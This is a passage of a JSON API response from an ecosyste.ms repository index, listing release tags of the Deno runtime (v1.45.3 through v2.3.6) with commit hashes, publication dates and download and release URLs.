ub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/